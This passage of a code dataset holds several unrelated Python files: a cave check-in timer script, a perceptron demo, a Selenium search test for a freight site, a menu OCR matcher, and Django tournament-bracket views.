Meyer\", 7146810524), \"group_size\": 3}\nmissed_checkout = {\"photo\": \"456.jpg\", \"date_time\": dt.datetime(2020,3,7,23,00),\n\"user\": (123456, \"Sonia Meyer\", 7146810524), \"group_size\": 3}\n##############################################\n##############################################\n\n#code for initiate_contact time\nexpected_out = check_in[\"expected_out\"]\ncall_out = check_in[\"call_out\"]\ninitiate_contact = expected_out + (call_out - expected_out) / 2\ntoo_late = dt.time(23,1)\ntoo_early = dt.time(6,59)\nif too_early > initiate_contact.time() or initiate_contact.time() > too_late: #if out of range\n initiate_contact = initiate_contact.combine(expected_out.date(), too_late) #replace with reasonable time\nif initiate_contact.time() < expected_out.time(): #if reasonable time is earlier than expected out time\n initiate_contact = expected_out #replace with expected out time\n\n#code for missed_expected_out\n#the missed_expected_out will check user status at initiate_contact time,\n#then check with user if they forgot to check out of cave\ndelay_expected_out = initiate_contact - dt.datetime.now()\ndelay_expected_out = 3 #delete later!!!!\ncheck_out = {} #delete later, testing no check out\nexpected_out_timer = threading.Timer(delay_expected_out, tw.missed_expected_out)\nexpected_out_timer.start()\n\n#code for missed_call_out\n#the missed_call_out will check user status at call out time, then notify\n#the cave manager to initiate rescue if user is not out\ndelay_call_out = call_out - dt.datetime.now()\ndelay_call_out = 3 #delete later!!!!\n#check_out = {} #delete later, testing no check out\ncall_out_timer = threading.Timer(delay_call_out, tw.missed_call_out)\ncall_out_timer.start()\n", "sub_path": "database/check_in.py", "file_name": "check_in.py", "file_ext": "py", "file_size_in_byte": 2396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.datetime", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "threading.Timer", "line_number": 38, "usage_type": "call"}, {"api_name": "twilio_functions.missed_expected_out", "line_number": 38, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "attribute"}, {"api_name": "threading.Timer", "line_number": 47, "usage_type": "call"}, {"api_name": "twilio_functions.missed_call_out", "line_number": 47, "usage_type": "attribute"}]} +{"seq_id": "214221771", "text": "import random\nfrom sklearn.datasets import make_blobs, make_classification\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef getPred(x, w):\n '''Returns predicted label for the data point x based on w'''\n x = np.reshape(x, [1, x.shape[0]])\n return np.matmul(x, np.transpose(w))[0] > 0\n\n\ndef getError(X, w, y):\n '''Returns error (number of misclassified samples) and an array of the indexes of misclassified samples'''\n preds = np.array([getPred(x, w)[0] for x in X])\n errors = preds != y\n return (sum(errors), np.where(errors)[0])\n\n\ndef plotPLA(X, w, y, pause = None):\n '''Plots the decision boundary given by w over the labeled data set.\n If pause is provided a non blocking plot is generated that will be displayed for pause seconds'''\n # plot decision boundary from w\n x1list = np.linspace(-5, 5, 1000) # Create 1-D arrays for x1,x2 dimensions\n x2list = np.linspace(-5, 5, 1000) \n x1,x2 = np.meshgrid(x1list, x2list) # Create 2-D grid x1list,x2list values\n Z = x1*w[0][1] + x2*w[0][2] + w[0][0] # equation of line\n plt.contour(x1, x2, Z, levels=[0])\n\n # plot labeled data points\n plt.plot(X[:, 0][y == 0], X[:, 1][y == 0], 'r_')\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1], 'b+')\n\n if(pause):\n plt.show(block=False)\n plt.pause(pause)\n plt.close()\n else:\n plt.show()\n\n\n# generate 2d classification dataset - not always linearly separable\nX, y = make_classification(n_samples=100, n_features=2, n_informative=2, n_redundant=0, n_repeated=0, n_clusters_per_class=1, class_sep=2, flip_y=0)\nn = X.shape[0] # save number of samples\nplotX = X # normal X matrix for plots\nX = np.array([np.append(1, x) for x in X]) # augmented X matrix\n\nw = np.zeros([1,3]) # initialize w to zero vector\n\n# variables for pocket PLA\nw_best = w\nerror_best = n\n\nplotPLA(plotX, w, y)\n\n# perform pla\n_iter = 0\nmax_iter = 50\nerror, misclassifieds = getError(X, w, y)\nwhile(error > 0 and _iter < max_iter):\n # randomly choose a misclassified point\n i = random.choice(misclassifieds)\n x = X[i]\n pred = getPred(x, w)\n w = w + ((y[i]-pred)*x) # update w\n _iter += 1\n error, misclassifieds = getError(X, w, y)\n \n # store best w in pocket\n if error < error_best:\n error_best = error\n w_best = w\n\n plt.title(f\"Iteration {_iter}: Misclassified {error}/{n}\")\n plotPLA(plotX, w, y, pause=0.5)\n\nw = w_best\nif(error_best == 0):\n plt.title(f\"Correctly classified all points after {_iter} iterations\")\nelse:\n plt.title(f\"Failed to classify all points after {_iter} iterations\\nBest weights correctly classified {n-error_best}/{n} points\")\n\nplotPLA(plotX, w, y)\n\n", "sub_path": "pla.py", "file_name": "pla.py", "file_ext": "py", "file_size_in_byte": 2677, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.reshape", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contour", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_classification", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}]} +{"seq_id": "344123524", "text": "\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nimport time\r\nimport pytest\r\n\r\nbrowser= webdriver.Chrome()\r\nbrowser.get(\"https://ati.su/\")\r\n\r\n\r\nDEPARTURE_POINT_NAME= 'Беларусь'\r\nISSUE_POINT_NAME = 'Россия'\r\n\r\n#Действия со списком, пункт отправки\r\n#Вписать пункт отправки и выбрать из выпад.списка нужное поле\r\nDEPARTURE_POINT_OPEN_TABLE = browser.find_element(By.CSS_SELECTOR,\"[placeholder='Например, Москва']\").send_keys(DEPARTURE_POINT_NAME)\r\nDEPARTURE_POINT_IN_LIST = WebDriverWait(browser, 1).until( EC.element_to_be_clickable((By.XPATH,\"//*[@id='react-autowhatever-from--item-0']/div/span\")) )\r\nDEPARTURE_POINT_IN_LIST.click()\r\n\r\n\r\n# выбрать из выпадающего списка пункт доставки\r\nISSUE_POINT_OPEN_TABLE = browser.find_element(By.CSS_SELECTOR,\"[placeholder='Например, Санкт-Петербург']\").send_keys(ISSUE_POINT_NAME)\r\nISSUE_POINT_IN_LIST = WebDriverWait(browser, 1).until( EC.element_to_be_clickable((By.XPATH,\".//div[contains(@class,'suggestion')]\")))\r\nISSUE_POINT_IN_LIST.click()\r\n\r\n\r\n#Нажать на кнопку поиска\r\nSEARCH_BUTTON = browser.find_element(By.CSS_SELECTOR, \"[data-qa='us-search-loads']\")\r\nSEARCH_BUTTON.click()\r\n\r\n\r\n#перейти на 2ое окно\r\nbrowser.switch_to.window(browser.window_handles[1])\r\n\r\n\r\nSHOW_CONTACTS_BUTTON = WebDriverWait(browser, 1).until( EC.element_to_be_clickable((By.XPATH,\"//div[last () and contains(@class, 'W-P2T')]\")))\r\nSHOW_CONTACTS_BUTTON.click()\r\n\r\n\r\n# Убедиться что появился попап регистрации пользователя\r\nassert len(browser.find_element(By.CSS_SELECTOR,\"iframe[title='Login popup']\")) == 1\r\n\r\n\r\ntime.sleep(3)\r\nbrowser.quit()\r\n", "sub_path": "transport_check.py", "file_name": "transport_check.py", "file_ext": "py", "file_size_in_byte": 2021, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 19, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 26, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 31, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 39, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 39, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "473779746", "text": "import matplotlib.pyplot as plt\nfrom PIL import Image\nimport pytesseract\nimport re\n# import easygui\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\n\ndef Area_Split(img, start_index, end_index, alpha=2, interval=2, ax=0):\n \"\"\"\n :param img: 化成矩阵格式的图片\n :param start_index: 开始位置\n :param end_index: 结束为止\n :param alpha: 阈值分割\n :param ax: 0为按行,1为按列\n :return: 分割索引列表\n \"\"\"\n index_list = []\n flag = 0\n start = 0\n for i in range(start_index, end_index):\n if ax == 1: # 按列\n line = img[:, i:i + interval]\n else:\n line = img[i:i + interval, :]\n count = np.count_nonzero(line)\n if count >= alpha and flag == 0: # 开始\n start = i\n flag = 1\n elif count < alpha and flag == 1: # 结束\n end = i\n flag = 0\n index_list.append((start + end) / 2)\n\n return index_list\ndef exmatch(str1,str2): #初步匹配\n n=0\n for i in range(len(str1)):\n for j in range(len(str2)):\n if str1[i]==str2[j]:\n n +=1\n return n\n\ndef match(str1,list1): #匹配\n t=0\n index = 0\n for i in range(len(list1)):\n if(exmatch(str1,list1[i])>t):\n t=exmatch(str1,list1[i])\n index=i\n return list1[index]\n\ndef cutter(list):\n img = Image.open(str) # 打开当前路径图像\n box1 = (int(list[0]), int(list[1]),int(list[2]) ,int(list[3] )) # 设置图像裁剪区域\n img1 = img.crop(box1) # 图像裁剪\n return img1 #返回裁剪好的图片\n\ndef connect(list1):\n list=[]\n list.append(list1[0][0])\n list.append(list1[0][1])\n list.append(list1[2][0])\n list.append(list1[2][1])\n return list\n\ndef findnum(string):\n comp=re.compile(r'\\d+')\n list_str=comp.findall(string)\n list_num=[]\n for item in list_str:\n item=int(item)\n list_num.append(item)\n price= int(list_num[0])\n return price\n\ndef scan(str_1):\n\n image = Image.open(str_1)\n h, w = image.size\n while h * w / 1024 / 1024 > 1:\n h, w = h * 0.9, w * 0.9\n size = h, w\n image.thumbnail(size, Image.ANTIALIAS)\n\n img = np.array(image, dtype='float')\n print(np.shape(img))\n\n # plt.imshow(img)\n # plt.show()\n\n r = img[:, :, 0]\n g = img[:, :, 1]\n b = img[:, :, 2]\n\n # 标准差\n x_ = (r + g + b) / 3\n std = (r - x_) * (r - x_) + (g - x_) * (g - x_) + (b - x_) * (b - x_)\n std = np.sqrt(std/3)\n mask_std = std > 7\n\n mask_1 = g > b\n mask_2 = g > r\n mask_3 = g > 0\n mask_color = np.logical_and(mask_1, mask_2)\n mask_color = np.logical_and(mask_color, mask_3)\n mask_color_std = np.logical_and(mask_color, mask_std)\n mask_not_color_std = np.logical_not(mask_color_std)\n\n img[:, :, 0][mask_not_color_std] = 0\n img[:, :, 1][mask_not_color_std] = 0\n img[:, :, 2][mask_not_color_std] = 0\n\n img[:, :, 0][mask_color_std] = 0\n img[:, :, 1][mask_color_std] = 255\n img[:, :, 2][mask_color_std] = 0\n\n new_img = img[:, :, 1]\n new_img = new_img / 255\n rows, cols = np.shape(new_img)\n\n # plt.imshow(new_img, cmap='Greys')\n # plt.show()\n\n vertical_index = Area_Split(new_img, 0, cols, alpha=100, interval=50, ax=1)\n # horizontal_index = Area_Split(new_img, 0, rows, alpha=20, interval=10, ax=0)\n\n # 垂直划分测试\n # for index in vertical_index:\n # # plt.axvline(index, color='green')\n # plt.axvline(index-40)\n # plt.axvline(index+40)\n\n dot_list = []\n for v_index in vertical_index:\n start_index = v_index - 60\n end_index = v_index + 60\n # plt.imshow(new_img, cmap='Greys')\n # plt.axvline(start_index)\n # plt.axvline(end_index)\n horizontal_index = Area_Split(new_img[:, int(start_index):int(end_index)], 0, rows, alpha=20, interval=20, ax=0)\n for h_index in horizontal_index:\n # plt.axhline(h_index, color='blue')\n dot_list.append([v_index, h_index])\n # plt.show()\n\n v_bias = 40\n h_bias = 400\n border_list = []\n for dot in dot_list:\n plt.plot(dot[0], dot[1], '.r')\n p1 = [dot[0], dot[1]-v_bias]\n p2 = [dot[0], dot[1]+v_bias]\n p3 = [dot[0]+h_bias, dot[1]+v_bias]\n p4 = [dot[0]+h_bias, dot[1]-v_bias]\n p_list = [p1, p2, p3, p4]\n border_list.append(p_list)\n for i in range(len(p_list)):\n plt.plot([p_list[i-1][0], p_list[i][0]], [p_list[i-1][1], p_list[i][1]], 'b')\n plt.imshow(image)\n plt.show()\n print(border_list)\n\n\n # f = open('菜单.txt','r', encoding='UTF-8')\n list1=[\"牛油鸳鸯锅48元/份\", \"清油鸳鸯锅48元/份\", \"菌汤锅48元/份\", \"大骨汤百味锅48元/份\",\n \"番茄锅48元/份\", \"清油红锅48元/份\",\"牛油红锅48元/份\",\"香油碟5元/份\",\"香辣干碟3元/份\",\n \"原汤碟4元/份\", \"金牌脆毛肚32元/份\", \"草原千层肚29/份\", \"麻辣牛肉26元/份\", \"鲜红苕粉8元/份\",\n \"安格斯肥牛22元/份\", \"麻辣小郡肝22元/份\", \"荷包肉22元/份\", \"鲜鸭血8元/份\", \"果蔬鲜肉丸18元/份\",\n \"五香郡把15元/份\", \"鸡翅尖6元/份\", \"鹌鹑蛋12元/份\", \"金牌牛黄喉26元/份\", \"精品猪黄喉28元/份\",\n \"嫩滑牛肉24元/份\", \"霸王牛肉26元/份\", \"虾滑28元/份\", \"鲜鸭舌16元/份\", \"鸭郡花18元/份\",\n \"去骨鸭掌18元/份\", \"宜宾小香肠16元/份\", \"鲜脑花8元/个\", \"鲜毛肚25元/份\", \"极品鳕鱼18元/份\",\n \"肥肠节子3元/节\", \"极品耗儿鱼28元/份\", \"正大午餐肉12元/份\", \"海霸王虾饺12元/份\", \"三秒乌鱼片28元/份\",\n \"黄辣丁15元/份\", \"雪花牛肉38元/份\", \"羊肉卷22元/份\", \"精选五花肉15元/份\", \"红酒腰片25元/份\",\n \"霸王排骨28元/份\", \"美好火腿肠8元/份\", \"脆皮肠8元/份\", \"盐焗肚条24元/份\", \"无刺巴沙鱼26元/份\",\n \"卤肥肠25元/份\", \"水晶土豆片\", \"藕片\", \"萝卜\", \"306冬瓜\", \"307黄瓜\", \"308豌豆尖\", \"309生菜\",\n \"310大白菜\", \"311凤尾\", \"312折耳根\", \"313黄豆芽\", \"314豆皮\", \"315山药\", \"316鲜豆腐\", \"317木耳\",\n \"318金针菇\", \"319香菇\", \"320青菜头\", \"321竹海笋片王\", \"322后切土豆\", \"501红糖糍粑\", \"502什锦蛋炒饭\",\n \"503酿糟小汤圆\", \"504现炸酥肉\", \"505红糖冰粉\", \"506印度飞饼\", \"507八宝粥\", \"508酱油炒饭\"]\n list_result=[]\n # for each_lines in f:\n # line1=each_lines.replace('\\n','')\n # line2=line1.replace(' ','')\n # list1.append(line2)\n\n for line in border_list:\n list2=connect(line)\n img = Image.open(str_1) # 打开当前路径图像\n box1 = (int(list2[0]), int(list2[1]), int(list2[2]), int(list2[3])) # 设置图像裁剪区域\n img1 = img.crop(box1) # 图像裁剪\n aa=img1\n\n plt.imshow(aa)\n str3 = str(pytesseract.image_to_string(aa, lang='chi_sim'))\n str1 = str3.replace(' ', '')\n str4='识别结果:'+str1+' 匹配结果:'+match(str1, list1)+'\\n'\n list_result.append(str4)\n print('识别结果', 'demo', list_result)\n return list_result\n", "sub_path": "img_scan_2/img_scan_2/scan.py", "file_name": "scan.py", "file_ext": "py", "file_size_in_byte": 7454, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.count_nonzero", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 81, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 86, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 86, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 190, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "pytesseract.image_to_string", "line_number": 196, "usage_type": "call"}]} +{"seq_id": "355211343", "text": "# coding=utf-8\nfrom collections import deque\nfrom itertools import cycle\nimport math\nimport json\nfrom xml.dom import minidom\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Max\nfrom django.shortcuts import render_to_response, render, get_object_or_404\nfrom django.template import loader, Context\nfrom django.template.context import RequestContext\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect, HttpResponseNotFound, HttpResponseForbidden, HttpResponseBadRequest\nfrom django.template.defaulttags import firstof\nfrom django.views.decorators.http import require_POST\nfrom kickme.tournament.models import *\nfrom django.utils.translation import ugettext as _\nfrom social_auth.db.django_models import UserSocialAuth\nimport urllib2\nfrom django.utils import translation\nfrom kickme.tournament.forms import *\n\n\ndef ajax_required(f):\n \"\"\"\n AJAX request required decorator\n use it in your views:\n\n @ajax_required\n def my_view(request):\n ....\n\n \"\"\"\n\n def wrap(request, *args, **kwargs):\n if not request.is_ajax():\n return HttpResponseBadRequest()\n return f(request, *args, **kwargs)\n\n wrap.__doc__ = f.__doc__\n wrap.__name__ = f.__name__\n return wrap\n\n\ndef google(request):\n return HttpResponse('google-site-verification: googlecdc03dfda8ab335e.html')\n\n\ndef alexa(request):\n return HttpResponse(\"\"\"\n \n \n \n \n

Great! The file uploaded properly. Now click the 'Verify my file' button to\n complete the process.

\n \n\n\"\"\")\n\n\ndef yahoo(request):\n return HttpResponse('')\n\n\ndef mailru(request):\n return render_to_response('receiver.html', {}, context_instance=RequestContext(request))\n\n\ndef index(request):\n return render_to_response('index.html', {}, context_instance=RequestContext(request))\n\n\n@login_required\ndef settings_account(request):\n social_auth = UserSocialAuth.get_social_auth_for_user(request.user)\n social_auth = request.user.social_auth.all()\n available_auth = {\n 'facebook': 'Facebook',\n 'twitter': 'Twitter',\n 'vk-oauth': 'vkontakte',\n 'linkedin': 'LinkedIn',\n }\n screen_name = ''\n for auth in social_auth:\n # if auth.provider == 'twitter':\n # url = \"http://api.twitter.com/1/users/show.xml?user_id=\" + auth.uid\n # doc = urllib2.urlopen(url)\n # parsed = minidom.parse(doc)\n # screen_name = parsed.getElementsByTagName('screen_name')[0].firstChild.nodeValue\n if auth.provider in available_auth:\n del (available_auth[auth.provider])\n\n return render_to_response(\n 'settings/account.html',\n {\n 'social_auth': social_auth,\n 'available_auth': available_auth,\n 'screen_name': screen_name,\n },\n context_instance=RequestContext(request)\n )\n\n\n@login_required\ndef tournament_add(request, thash=None):\n tourn = None\n if thash:\n tourn = get_object_or_404(Tournament, thash=thash)\n form = TournamentForm(instance=tourn)\n else:\n form = TournamentForm()\n\n if request.method == 'POST':\n if thash:\n form = TournamentForm(request.POST, instance=tourn)\n else:\n form = TournamentForm(request.POST)\n\n if form.is_valid():\n tourn = form.save(commit=False)\n tourn.owner = request.user\n tourn.save()\n return HttpResponseRedirect(reverse('tourn_item', args=(tourn.thash, )))\n\n return render(request, 'tournaments/add.html', {\n 'form': form, 'tourn': tourn\n })\n\n\ndef tournament_item(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n ttypes = []\n sports = []\n for t in TOURNAMENT_TYPES:\n ttypes.append('{value: %s, text: \"%s\"}' % (t[0], t[1]))\n for s in Sport.objects.all():\n sports.append('{value: %s, text: \"%s\"}' % (s.id, s.name))\n return render_to_response(\n 'tournaments/tournament.html',\n dict(tourn=tourn, parts=tourn.tournamentparticipant_set.order_by('order').all(), ttypes=', '.join(ttypes), sports=', '.join(sports)),\n context_instance=RequestContext(request)\n )\n\n\ndef tournament_list(request):\n tourns = Tournament.objects.all()\n return render_to_response('tournaments/list.html', {'tourns': tourns}, context_instance=RequestContext(request))\n\n\ndef tournament_participants(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n\n if request.is_ajax():\n part_form = ParticipantForm(request.POST)\n if part_form.is_valid():\n tp = TournamentParticipant()\n tp.tournament = tourn\n # p = Participant.create(part_form.cleaned_data['name']).save()\n p = Participant()\n p.name = part_form.cleaned_data['name']\n p.save()\n tp.participant = p\n max_order = tourn.tournamentparticipant_set.aggregate(Max('order'))\n tp.order = max_order['order__max'] + 1 if max_order['order__max'] else 0\n tp.save()\n return HttpResponse(json.dumps({\n 'status': 'success',\n 'html': loader.get_template('tournaments/participant.html').render(Context({'part': tp}))\n }))\n else:\n return HttpResponse(json.dumps({'status': 'error', 'errors': part_form.errors}))\n\n part_form = ParticipantForm()\n empty_part = tourn.npart - tourn.tournamentparticipant_set.order_by('order').all().count()\n return render_to_response(\n 'tournaments/participants.html',\n {\n 'tourn': tourn,\n 'part_form': part_form,\n 'parts': tourn.tournamentparticipant_set.order_by('order').all(),\n 'empty_part': empty_part\n },\n context_instance=RequestContext(request)\n )\n\n\n@require_POST\n@ajax_required\ndef part_save_order(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n # check ownership\n if request.user.id != tourn.owner_id:\n raise HttpResponseForbidden\n\n # get order from request\n order = request.POST['order'] if 'order' in request.POST else None\n if order:\n oo = order.split(',')\n # set order for participants\n for i in range(len(oo)):\n try:\n part = TournamentParticipant.objects.get(pk=oo[i])\n part.order = i\n part.save()\n except: #DoesNotExist\n pass\n\n return HttpResponse(json.dumps({\n 'status': 'success',\n 'html': 'Order saved: %s' % order\n }))\n else:\n return HttpResponse(json.dumps({'status': 'error'}))\n\n\n@require_POST\n@ajax_required\ndef part_delete(request, thash):\n tourn = get_object_or_404(Tournament, thash=thash)\n # check ownership\n if request.user.id != tourn.owner_id:\n raise HttpResponseForbidden\n\n # get part_id from request\n part_id = request.POST['part_id'] if 'part_id' in request.POST else None\n if part_id:\n part = TournamentParticipant.objects.get(pk=part_id)\n if not part:\n return HttpResponseNotFound\n if part.tournament_id != tourn.id:\n return HttpResponseForbidden\n part.delete()\n\n return HttpResponse(json.dumps({\n 'status': 'success',\n 'html': 'Participant deleted, id was: %d' % int(part_id)\n }))\n else:\n return HttpResponse(json.dumps({'status': 'error'}))\n\n\nclass Cell:\n empty = True\n part1 = ''\n part2 = ''\n css = ''\n txt = ''\n ctype = ''\n style = ''\n\n def __init__(self, txt='', css='', ctype='', style=''):\n self.css = css\n self.txt = txt\n self.ctype = ctype\n self.style = style\n\n def empty(self):\n return not (self.css or self.txt or self.part1 or self.part2)\n\n def __unicode__(self):\n if self.part1 or self.part2:\n if self.part1 and self.part2:\n return _(\"%(part_1)s vs. %(part_2)s\") % (self.part1, self.part2)\n else:\n return _(u\"%s vs. пусто\") % (self.part1 if self.part1 else self.part2)\n else:\n return self.txt\n\n\ndef grid_gen(num, names=[]):\n names = deque(names)\n rounds = int(math.ceil(math.log(num, 2)))\n num2 = int(math.pow(2, rounds))\n width = 2 * rounds - 1\n height = num2 - 1\n grid = []\n a = (u'├', u'┘', u'┐', u'│')\n for y in range(height):\n grid.append(range(y * width + 1, width + y * width + 1))\n\n for y in range(num2 - 1):\n # this one piece of code set participant numbers like (1, 2) or (16, 32)\n if y % 2 == 0:\n c = Cell(ctype='part')\n # if y + 1 <= num:\n c.part1 = names.popleft() if names.__len__() > 0 else 'пусто' #;partn +=1 # y + 1\n # if y + 2 <= num:\n c.part2 = names.popleft() if names.__len__() > 0 else 'пусто' # partn;partn +=1 # y + 2\n # first column\n # print c.part1.participant.name if isinstance(c.part1, TournamentParticipant) else 'no' #, c.part2.participant.name, c.part1.participant_id, c.part2.participant_id\n grid[y][0] = c\n # grid[y][0] = y + 1 if y + 1 <= num else None, y + 2 if y + 2 <= num else Cell()\n for r in range(2, width, 2):\n grid[y][r] = Cell() #empty\n else:\n for r in range(0, width, 2):\n i = r / 2\n if y % math.pow(2, i + 1) == (math.pow(2, i) - 1):\n c = Cell(ctype='part')\n c.part1 = y + 1\n c.part2 = int(y + math.pow(2, i) + 1)\n # other columns\n grid[y][r] = c\n 